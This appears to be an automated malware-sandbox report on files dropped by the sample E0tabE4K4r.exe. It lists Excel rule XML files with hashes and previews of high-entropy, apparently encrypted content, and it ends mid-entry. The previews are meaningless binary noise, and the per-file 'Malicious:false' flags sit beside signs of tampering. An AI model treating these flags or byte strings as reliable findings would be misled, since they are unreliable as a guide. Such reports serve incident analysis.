                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):785
                                                                                                                                                  Entropy (8bit):7.746098512627788
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:4oPRgVqV/FeCBwxNFYjHDHVurgdAhmo+2bD:42GS9eCBwxGUrAAD
                                                                                                                                                  MD5:00A1879FD45776DD106B2CEC475F36A1
                                                                                                                                                  SHA1:D2490934B6BBE57F3CC043CAA8407F72C6377530
                                                                                                                                                  SHA-256:644F038AB6D55E86F41CCFBED10CC22AE66327FB8542E661F3ED3C5338B2EFF2
                                                                                                                                                  SHA-512:1FE4C2403BBEDD8730DE666217D041CB24470FF89AA5A1F7F763B191DE76C5748C01F01DF25D40EA92D8A8A988796C930D09175A97F7ABE0541B36917B57B1AE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.LPs..`......i.......g....u.j.....j.!.m1.pp...C2.[..*..632......+.8I........;6j...<.r.:Vo..g..6QmT;..I......W.Q....p.)......(...c..0..L@.....v.7..c...8..O`.#$......T... b/.L.^.B..zzZ..@s.N.....z.g.@|..(...}.ayTb.ne..9.............Y3.%{..I.y..o.....'0j.t.\..v.*.}.(f..C.(...?......#....7.rI<.5.G>.&....SdGLw..?.....C.L.4E.7Z.?i.Y.A.......].7.A......#....t@........D..h.t......Z.>:C...[n$+.....*....~.2=.Ia=..%!.#c[8.!R...`...?C.|.D...>.m.2...Yp7..Y..........C}..r4..:s.$2q."...F....C.#.J<..R......'Jg..........[*..."...K).i+SS.*%.uL.E.):.XC...HxB....Dv....k@...4dd..&...r....!.r ..S..d.%.J..m..]L.........nU4.@`...........W...w].;.}..j.wp.e.........&.$( '..*.lmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule460009v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):752
                                                                                                                                                  Entropy (8bit):7.711001692269592
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:az1jaiADrno4rkR7kwBXxRdZfqu1e37L1C5OEDFnE3wC3+r8hxlMVkSzNnkn1WSw:9i2no2wBXLfqu1e1C5OsEgC3+CxCVlkc
                                                                                                                                                  MD5:39181AF13990B2706AC1293E05AACCEE
                                                                                                                                                  SHA1:324BB6384E81AFCEAF750750A02E682446A3C40B
                                                                                                                                                  SHA-256:D21564FFB9E337B7F68AE906628CFF17E5D82D66E0E153D19C01C2C0501F682A
                                                                                                                                                  SHA-512:2D1D27BB671392D8A61ABCD764E9E4FF984C7F7ED6BE654108F6F966102FFD257772FC63C38A7B576E156EC492304DB59DB02008EAA6C9F9347B4FA527AAAA7D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....<.$.....@gRr..8J..4..2.........o..y...2.O..@.t.t*.r.7j.....g`.y......7W.`...j......>.v...q.7V...i(&.\....#s5.c6...8@F.......j.O.R..I)............_.2.....4....i.7N.......1k]5..2..104@...:..l.47........C....Xu?".0...Q..B.t...2..J.i.V...wK..W.Q..Aq.....T.#.2....`{...m.m(..Y.g.I..wt)......bL..]..^.1C.2q...(KSQ....|..nz..J`..;.jHR.5.u..o&......G..Um:$..8..aU...{..G.....L..d.|".O..p...2.Ie....{."n....-.9-.g...4..uf..kK....-...d.]....D.g..3F....jS7...0..R..!...fi.g;>;.g...gK..\..=x0+..$.~....N.~.i..5...d.,..Sz9&...?.IB..3..X!.....b........-].Qau].}..sz..YRe..jC..B.R....).S..w)"aPNk.e..N...v.T1.../....:...n.xy...`..w}.A0...Z.(....9.*5pmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490002v13.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1428
                                                                                                                                                  Entropy (8bit):7.865821131462322
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:36DurBaB4S3Ya7jTDeTcMuDTM/aNGJUGYR8GfmU8RylMjQVMFKfuf2bD:36iVM3Y+TCT/aAbYpOUSywQVMFV8D
                                                                                                                                                  MD5:6C63944B9CB87F25C9FA27222ADDCF62
                                                                                                                                                  SHA1:3AF71841D448256A502FDDC4AE63D2BC6C78B262
                                                                                                                                                  SHA-256:BE0F35374BA0381F9F6434BC215174BAA9CAD5518F905BE4A95709004F92D98A
                                                                                                                                                  SHA-512:6BE14D674C338D6ED6E446CF4383AFADB1B4B3C42D6A9E55B880CDFF26BB432AD0AC9106D49660C9D55893D2C94CDC8F8D5AADB1CC77C66BA7F94A8EC7550566
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml!-.....s..|.... ..r0AU*.r,6.*<../..6.,.M....(.3....p.H..t..$:...,.uI.....ib..F3....[.a......s(9......!.mn^.]...V...GUI4,.'Q./.....O.V.e.J.5h.f....2..Ch{...q. .9.c..X{.A|.9..<... . ......s.TF......e.MQ._V.W...qmY+$.mT..E.Vf1....Qe.gQ.....a.....m..&....v...:.A..io..d.v_.u../?.w*.-.+..O.t.f%.Z..1..u..|....S..)i(.S..V].....e...T..X.>.z......;..T.....D....k........XEo.].R.Y.7.Y._..7....lg...uMs.T8Ki2?v.K.._GX7R.0.....#.\....a!ep.^+.;.........?...9..Z.;.T......kQ.i....).e......6.....`.-.\x.i4.....T.7..(aJ;.....Y.. ....%.*@...\.79.c..i.y..g".y.=.I.i.s.....(....T].1.}.!,{..w...x.l3....+?...l.]y..#.T...\..F.&....]-....|...)>.x.Z..a}2.~.9..+....i>s..~.+.'.W..Y.HNYG..D.>? ....B.<.7.Z....9'J.#.m,....r.v.%l...$..4.0...3...^..'.u.rH.G;.0).....le>.c.....f.yp.......".......aW.-iK.e..l....*...,..4.../Y.*3Re.Y}..wL.&..!...rA.3.~...@.sQ....D._..@c.L.........nI.$.....mD7.y...IW....k!.L.U.)peO?w,..]g}.PR........=.Ln.N....vru.2. ..1WY.A.r...R..#].Y.].U...3.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490003v7.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):978
                                                                                                                                                  Entropy (8bit):7.798130247346259
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:yg5c90w+KUn6N3G5lyCc61Msv5/2nN6RObh2bD:AjU6NecCcv+/AN60b6D
                                                                                                                                                  MD5:700783BAE6BFD6AA22B1903467A60907
                                                                                                                                                  SHA1:2484A329D3C9549F4260883FF7AE58D5B4BA3FCF
                                                                                                                                                  SHA-256:51009B193C27739F00AFAECEF4010255C656292D33208E318D0B61EAA011B0C0
                                                                                                                                                  SHA-512:ED8D21708BBA99E28ED083FCAEA1EC8778408F9402CBFB115BF9DBC7D110EC1B3FEB09A68C60416FE1A32A293AADDF7361F14B1EBAEE8E91DE05777668AF4DBE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.2...8..K}..o.2.n...k......I...@J}...>.+..dj..L'.y.._.L..:......V..;.a....&.+c.R.......u*..}BO......t...M.`sknO..5..Y...!.qL{..-......AS1...t.l....W_.;..M.g3X.U'Z.....?.$.{.V0.0..\....b...{bY........G...JH..,3.$...ueJ.....y.R/.).jvL}.-.).<...3.}.....I.'R..M......mB..\K....>.O.7DXZ}.....~..zRH....M7...5....s.....*h..&....&...t...2{..&k.. ....S.."S&.G%.....A..;!./..4..k..../.......I...O..YZ.....X......;*....L.........*....6..P\.......pX..g.&ds...(.l...cG.GY..l..;c.i.}%...e@:..z/.....d.._..d..&..r@. ....h...)FG..?...n\ZL.....}..."..\....."...x.<R.L...k....y..9M...5YCm.M5.....__S. .lh.M...(U{.D...=K..T&@f..p...!...e...hBY....%P......nM..d..H....F..8......K.WJ........h.../Tu6........*..n.c.x.;...|.......K.?s.y[.....Z.1Vn.O...$...x.*\...x.....8...g@;.....I._...x<l......._lw...C.j....~.a.WqS..b....<._.[.2.Y4....C.I:09@........4@ /...*i.}.'j.....41&WmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490004v5.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1008
                                                                                                                                                  Entropy (8bit):7.794324204150614
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:7CgSDiDvvDAYjKh94Q6fC3oQkHYbaJ9JMpvm42bD:G1DevtOto7Yb4Ds6D
                                                                                                                                                  MD5:9865ADF8E7DB88036C1BADA31F5C6FBA
                                                                                                                                                  SHA1:81692FFAA36ECB264F78AF4D742C184AA5061122
                                                                                                                                                  SHA-256:8291DDFE871B59F793959CCCBFDFC71295C7380B3FDCE9B6A7587DBFA760469A
                                                                                                                                                  SHA-512:4B7E14139BC4411B7389215D04B42E34E133CC99F718762AB6E2AD0FB22162CF1709515869314D7CF3F682782E0665A5826C05C7CE79F70E4312C74A38A3C2B9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..?e..a.\.6..n+...Rn......i{..p./.......5y....h.i.....5F....R-.+..h.|Tx2^.1.....r.q..".......k<$z..L..bS.g..y.`.Q*......v.7+*...W..M.:..-w.J^..[j.........Z......t@]...BT_...>.iX......Z..2[.`..G.u....P.e^.R-&s.|w.%....WA.v.~.v.E.m. :tJJg_"..U......i.Z^....;UR7~..J.+...D5.R.H....]U...<xlr....mW..X.-.g...e.(...Y.......e..7sn....n0........M.;CP2&....=.R.. O.a.S...s...C.S.7Cg....,3.h[^6.X....h'E.y.-0.g...).....{.B.8.2}."...T......v<$gY.....G.E.8`...q..J..S.x_.-4>.CD)...).S.).i.._Nb.K.....6..Y...<.......d...uE9.1...JE.4Pr#.....{.JTWp........ZPW]^...<a.;.......}.+.....Y..6p....H.%..9...v....D......,..?qHj("[g.k.7...c....Ho../h..OX..; y.....[r.<..Q4..R[X..d!3.y|.6.....q...H..<.N.K{...w.L..a/}..<F....!n.......x.V.63~.6.b.4......KDx.`w.*HO.:./n....&Jz;...e.j.{......{..{.,l......95...S.W.FP.fl...S..S.......K..... j.Z...&7.. N....i..T..o.......J.{Vd.....>.1...|......RmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490005v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1028
                                                                                                                                                  Entropy (8bit):7.775889636251777
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:/1jhqJiAV3+USladfgu7LQ7HLOFDfpGqT7+Z5EKr3WeJBd2bD:/5sJiAEUsadfgQiaFaEKrLYD
                                                                                                                                                  MD5:96ADECAFDF5935EA71FBF9843BA0FED9
                                                                                                                                                  SHA1:3F144B013AF01C1E75BFFB19BA2F48839CEAAEA5
                                                                                                                                                  SHA-256:77ACBCE55BBE31FDBF8B44EA2F47843F533E4F94786B066CCB74A5052FA9E63C
                                                                                                                                                  SHA-512:9D7F93AE212DBED60A5FD34D5D27E5342620DA8F45B6B51D30FC5F1B3B742F5C29716D1E08F1085899AEF4ADC0A6C1D3E5CF62F8BE6FF1C5D9CA849B4B499135
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlN....;w-..9....\-^...f%R..........X1...;m./...j..gQ...ok..Y!7"...zI...:.c.....4.....I ....^.&...8D..hZ....l.KY.r........b.....y.gO....s.im.2..4.PLc..F..T.$F..[.E.k.....^....%B...F...Q%.d...V]q.g4FaP.............+.o.S.`...1....E....O{.5.. ....._+..f*..7...........n(...AZ..]g..?..I.....@%.O...R.L..@BI..N.7...3p?...EW.1Q.Y..l..7D.x.....s.....=...m..p....w...!v.....a..!q.....~..k.5l..u.h.......5...}.%.'.[F.O....*pb.u.........8E.V......Pa...%.."J....r...9Z>.@..ON....'){DF..D.........';...S.u.V5ZHy...P.*).`y..N..............!.....c-.ds.pX:.]O@.....$....?@j.O.L+..$.DNu~n..W.mIx...z?..._.+9h....IQ....r..h...a.......%+...g.k!..A..IX..p{....A...8.4.Q.y.y...........y#a..'0.Q.%-.P`2....l..S0n......)..m....nB.W2..B..D..J.....4............m*.Vv...=ml...;...up3.?..eZ.L.._..FJ..KAp0X..=.[................e....g..k*u..t...u..@dA..D..}B.p7..L....<.-.(L.=|DV.}.l.jQ.t4....S...l.....[d..a)..4mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490009v5.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1453
                                                                                                                                                  Entropy (8bit):7.87196027410772
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:gjXuEeJ6AVQ8sDHkHanDvy8J2McFP3oSB1U6cEP+U8NpGfjUBQCrF1tz+CYnbUwr:IVeJpsDHkMDvpJ2MMzc6fjUBQY5zT6Kk
                                                                                                                                                  MD5:7F16A9B85137FE1A701D018E59C0399D
                                                                                                                                                  SHA1:158256FE4E23F77D4C8920C2B0366BEC08EDE833
                                                                                                                                                  SHA-256:D02F4883D98D20F6C81F23271F88B9B72C2BCB2ECA599A50DBDD261536139559
                                                                                                                                                  SHA-512:F160C0533DBA002A2C336B726BAF6F64591CE346CB57F03DB16556F92B8D60C7EBB0BA8E1CAA4EDB06A4DDFF26B552F35138E24EDE5D62C295A3ECF13E60FF16
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..-$Mv. V.....X.@76.....D.l~..u.8.3.GU.........A#.ecI..`..f..{......j8.\..o..,....3......].z...F.I.)...b}j..j..{o^.F$...O-.9.B...[.A.iU[X-.W.c+..|....pbi.]_....[#..x.u..d.d..S...;.k.k..?....(.....,(..*D...a...*....Y..H.F.s...`t..4.^ZC.!8.^Ay..^...$1.CKrP.#M."...J.B..Tp..#.l5I....6..N6....PeCK...As.........[.../.V.M%lr.._.."@q...m...EQ\.v..l...%...2....XSZM..\~.7B.f...AD..v......F......qM.<p.|.a...%.@...p..A].(.....a.Q..M...F...K..:.Cm...t*...K.N..B.*>...-.....GL./..z...p...P..N`1{Mv..5.lx...Z...-)...<.....5.....L.qYf.c......"|.h.we+/[>..zn@..o.shl./!...|...F..~.I...l......?FH.......C......8.e%.....;......M.;.....V...z...[..AO...C..:"......[....TbP...^p.(C.^..Ab...=..]..).....yvA..u.Utv.......!E.,....Le/.U.P.DC..L........i.8|.p0P*1........p."(j'?1...@..:(.N9`.T.?.OErq.X...`=...G.\zA.j..>;..<6..)T......p.q..W..@e.6#....g...U.f.....D....X..0..S.q..L....Z.Q.4H.....]._;.....i...C%.*_..qCj ....sz.7....j:..2.j.-.;tw.n>.%..I...+.....O.._iv

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490010v7.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1388
                                                                                                                                                  Entropy (8bit):7.861639860699833
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:diEggdqcktRmc1nO5AqN5IRgSJXp3TWyrPbMxUgrOcmQr6pLIAccz7XfVakBCYWW:NtktRmMS30p36WDMlKcm1pcAcHkhHD
                                                                                                                                                  MD5:6B655E5FAFBF87029FE651FFB6AB7B20
                                                                                                                                                  SHA1:09E38B8E10D41D7D7F04A26690F367217718064E
                                                                                                                                                  SHA-256:3DC7796FCED07A33673F2D81366FE4DB4E4947B1242D8D8F4D2393E61C757F9B
                                                                                                                                                  SHA-512:B7BC6B57FF67DEDF75E95FDBDFF6E4FE66535D4C524A3C2C53275B4C068902A4B291D68D9DDDFDD87416E1B574B0BC6C5D9A1230BDA6420C96D98131EF2ACEB4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.......W.8G.....{k.A....d.t)c.a.o..3M...U...1..=........8.z1%D...7..(.$4.=d&2..pR2..2..*s.X.9.nW...v.%...;...O.z...VM.d...}Gu..;8..D>..R.H...z..[[.y..TH.........?8...S0$..\..>./g.......c.%.J...o.G.%-..Y>..U....0P..x..1{..6.C............:. ..Z...=..p.....>.'.=.8G..A}.;......[..Y....:..>..~(.T.v.......{.x.#.p..&.....7...0.......xavDh.C....3.......B..lz.=;.)Eiu..i.....;..^.:{.7.d....q..*.L),7...~.M..k.....G.o...3?{..P..U....$...P..c..r.....P>h....s0..l..".-..Y.n.q.x....t.QOi...ASy..c......3...]+.......W.8....._.Z|..m"F#=..a...rdj..A...v........}...6.4.7KJ5........v.....s_:.W'.K.v....p..s.....1f....I."-..5..$...0...U+I.<.V..ef.w...Vuh[..C?.._'...e.o.mR.M"..hB...^.........)....X.....y=[. ...HJ.t.:.."1..qi.8.@.P..i.r..a..;.....*..>...#RU..%z....L..........e.M8!...N .....>.W` .|yu.4JK_.aqH..*..;.)E...Z3.Mjo....(...Z..)..(..2m.|S.%.C%f).7.WZ.\b...B..e......D......n%...-(..$.U...]......:B.s....#......W..~f..8$$..N.7.8.d...T....VoK.1......-E.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490011v4.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):856
                                                                                                                                                  Entropy (8bit):7.735605574397785
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:o1BxSjBbk84ou/ijbMbae7V/noKMDu10jJ5BJjmTyDz3j3NPv3yT4yOPv6NerWSw:oyBghKjgW8PoKMD/DFDzzRv0UmerV2bD
                                                                                                                                                  MD5:1B234C3168F044EBD65698F19CD69053
                                                                                                                                                  SHA1:A271219B967CE845D41B0400FFAA8F6979BDF394
                                                                                                                                                  SHA-256:95BCB44C5783242F66A8E122C18B9B6380E532300F2216CE85E63D29F651DF38
                                                                                                                                                  SHA-512:6F0E6DAB0B481FDC897CE6BF30D05BB94BF9C07653A89C617241863EB4CE2BF56D4654473862D5966E565FD01A76A5474E7D66631C6B18B4480A36E24D949A55
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.M....,<?.5.#..(.T@..;ebKQ...G...P}yn..=..A.k.J.....E..0H..O..p..o...}?.e..e.....b....Z<.../.8#....T..B.*...ZU..`..|8W..>g=..)...(..T.....P..P..X?..G/.|.., U.(im=. ..v...W..5>9.X...C....[H]...o'.}i....Z,YYmS....^`..X...'...?...@e.........+)...d.....cA.X..PK+..'VL.....?...s..........C.... .ilk..2..j.K.AKM..@x.Nu..t.....VG`..@.....}.F....8^...G&.D.U......[.+.....ZE.<b^7`z...Ch...e!..j...b-..V....x.&,.Q.._........*.L.w4......[Z.B...+:.1.V....<..K*...#7.J... ....<..4...H._...(.o...<y..d..6...=`.........e.b..%..E.7..D......>.^7&.[.\D.(5/.......Dq..Q...@..k...#|...>..9'N..Yu.|`h;....WC..4I...L...gIY*...;E5vW..l..M....I...c..ko..:K..{:......:.".sF.....C...#.....[1{.T".P......j...4$..^x...y.....e.>.T...OK..V.|...(.:..G.w@.......J.s.=.%.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490014v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1084
                                                                                                                                                  Entropy (8bit):7.784029997179507
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:dylEs78IjhHsqkdgNdZAss/wyA1Yc6+80M+LwYVhy3Uv+2bD:d53IFTKgitb6rtM+5qkD
                                                                                                                                                  MD5:75F02F6A634B3354F8FF5AE3B214290F
                                                                                                                                                  SHA1:12D14B676F41D57E561045E22DD0CE5743FBE7D3
                                                                                                                                                  SHA-256:0D8B6F6A96953BEEA17C1FE853F56AF6C65057078AA948FAE0B7F50376879EFD
                                                                                                                                                  SHA-512:E81EB04660FB9D6B6826C7E3B9594AFFCA89A9934B15319C2D41E331890410B086A17CA62B32752BCEA8354412E018A9C4556F835B7F84C02F55ECC35C9B73CD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml#q..."`gE=u2...=].v..)W.L.K0.;..?R.....k.FP....x{:c...(B.].s+.....lo.*x..2.........cX.....K.Eg=.];...Pb.= ...@...d.$..kPGcY.+Q..aM...9......] ...+S.f..EgQ... 9./.N).(.....c.h.*@f.c"...yg...q...u.........K..=...RGQ......^].0@t5.y..S.........v.P5.w(.....X.^...Ty.~k`.6......I......r.1..+;.-.Rm}........5<....v.m...6./...P...n.<._..(.....iE.E-.$..7....6.m&.....s..fY."...=[......q..j.T.....x.....O.@4.>.L.3.%W.n........./.Kz.j.G.a.P.f..0.WD]2+.Z...=...D\.3.t...U.u9..X..].O.0wN.\.Q.P.../_.z^.*.....e......O.Y.].<....F..!..sk.T.F.~..d6..q.........k.0+/....Q...b%.*.I..NE.Iu\..~ZO&.]m;....h/L.a.x+.K.O:..-.....0....f2..u.J:...dE.U.Z.....j\O.LhB,V..J..6..LF......0..f.._...*.......>R..L.."..)-E.x`Vz;.i...Ga.o.zG.z....F...Ef.....V.,.?1...].L..T{)d...$...@m...|h..]Dx.-..g0..4@...P3...>j..hl.ZH|a>B...\yN..v..Y.(_..*.H..%Wb...3.@....E.n...t?....E...#..}..C...}..Gw...".<.H..=g...kBH.8~(.ks..1"d.t.a...J..J...ZL[-M}0...y.....a.d......k:a\<~...].

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):924
                                                                                                                                                  Entropy (8bit):7.788706108081374
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:AaRTaUJqjJgSuTuaTVBQvbNvJc7kXzqNV5SRFJkVOY2bD:AYxq6SsoNOBaiOLD
                                                                                                                                                  MD5:9D8A4BAC5A12DD826BCD4753CFE1DBEA
                                                                                                                                                  SHA1:6EE19EAC1FC4542C503F41CD2B58127170E25CC2
                                                                                                                                                  SHA-256:92365FBABD24C4A27CC8B4600A432DEB5DDF9C894AA1C96E07FC3EEE04183A50
                                                                                                                                                  SHA-512:5ADAF1A9F45B1A8B6F4296D6F2499AAB25B72048066A4E6229379EB0D4F28C3A39C2AB022023CB36A1E83E1F96899F95C3E79C21FF665734A59B98B61BE5D7E7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...Pt...:?C.t.E.X.....kh.#.. .r^L\.......y...o....9B@=.sn.m...1.E=v.5n?............W....e$.`...Q...E...K.,7.........&3.{J.3..Z...hk..r..U.[.>....v.I..2.p.>r*.o .5d....D..-...........R.f9........1} d}Eh.....~..6X...s.....Q...(.|VL`pDkz.......%?.S8..&jX.....2...3...o.........?7..`(..b.%....3...?~.Q~....I...}m.~ia.C7..*1k....K.M......:L@.?L|vCf../....=.0.w^cQ;..6..d.....W.e..H"..N_...YX.J..tU..5.....H..al.dv........\.a...Q...2.V.u....HE../...Sl|.wM..d...8mU....{.jrYP..z.P<.gxL.s....U^O6...%.4.N..k.o...{...tu.7M#.............]a....9..j..$@#W(..._.'../.$q.t.k<...*.Q..z.. ;J...D.K^..D9x.9`..t..=.../(.....-.N.8.;.."..P..:..'.w/^....Y.{o.B.nQ.g....H......>Ng.?.o~uD...a.....J..S.&....>...n>..K.f...b..+.U.a<.>......s.=.$..,....jXTi.xA.q...N.v....m.`a.(....V..`UGR.!....7r).N]w.....q.}...DL.B.j...3s...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1090
                                                                                                                                                  Entropy (8bit):7.808756576252184
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:wLMc4OwE8eu//mk/28Wxa7loaddwkHAF5/Of+wYf7ljmSCnBk8DESn2bD:wvhJ8N/xOEvdZj+wYf7ljmv9iD
                                                                                                                                                  MD5:B674C2CAE59DF5AE1FED0623AC9E6E66
                                                                                                                                                  SHA1:71C796689E997B5147FBEC16B4CFB2A6DB9384F1
                                                                                                                                                  SHA-256:8E82288BA3552D0B9232A1CDE2DE84E7228C673025EC2E91570A2428FCB1F159
                                                                                                                                                  SHA-512:6BD95F13BD429DBE5A0CDF85B3C4602272C561C8A41C6E994D7A4605461C88A630112446F9A023BFE2531F9991D3A481E433CD8BD868EEE8309C2EAE037C5080
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....G....2.U...KS.%..R.>.Md..^..............8.j.........;*.RQ..8.........xv.D}.i...D....l.!)...e2F..P.m.*_g.9|.X..gK\...b..+............5.]...9..Zj.qxw.....j.bf...za?.2.y..L.....E..o..L...?.].]6.Z..t.gt.......W..B......`..s...KqM%.ae...7>...?....M.o^j.w.Z<...ifs....r..n.G...!..xC.S^.T.S$..j..E......4..y.v..E..i.D5O._A..........l..R....Q.0...C!-...K.^.m?$...../......Y...0.g......s.Cx.*.!T.W.u.N.)..C....)..^...[wENi....m.l.T..^...l=.._U@........'... +v...-. ..h|......Yj...U1{|.......X...b.h...m,+.~.e.A.]....b.mw.j.......5X.y#.l'v...X...:..Lu-..a..Y.u...&~Q>M.f:...".nQ.XTp.-".g....Y..S&3........_..J.!.8N.j..M.e...j..{..f...r~.(....$0..........y..4..9.....C8=!q.l...........D.;..TR..\.+.N.........yy..-....m#..{...$..`.-.~......Q....'.)}e..a`Q.b. ...h\X..{...Q........Y_H$.R...b.y(...1....W......@j]#..e.DII....8Mg....r...X...}.....{u.. mX..../........6.YVrj....!.pz,...g...4..6.x....d.T.T..j3_<..;.....|w"...N....AvQ....P.p07...(.:...Zt.DNyd...F

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v4.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1090
                                                                                                                                                  Entropy (8bit):7.799211940729836
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:QVfG6xpOd4QTruHz0iCyIqf8PF4f9WkRAxCHqGj7pFvV2bD:xWAJ+HXvIq0Pm9WkRAod7LGD
                                                                                                                                                  MD5:0C5811252B0DA56DDC7E77AC16A30B13
                                                                                                                                                  SHA1:E9FBBCD706D14B7748FC0BADCFD6F8C2CD3CBC28
                                                                                                                                                  SHA-256:86421ED1D512E834AE6630E6138F0267754E82EECEF4C11EC0AA3FEC07CA45AD
                                                                                                                                                  SHA-512:3B553C20ECCACC19238B540695C26615ADBA3103243B801B2908E2227C7E4F934559012F7270AAB1586EBB50B622FECB08B8DD5DBE03BB27441B0B7F5C779ADE
                                                                                                                                                  Malicious:false
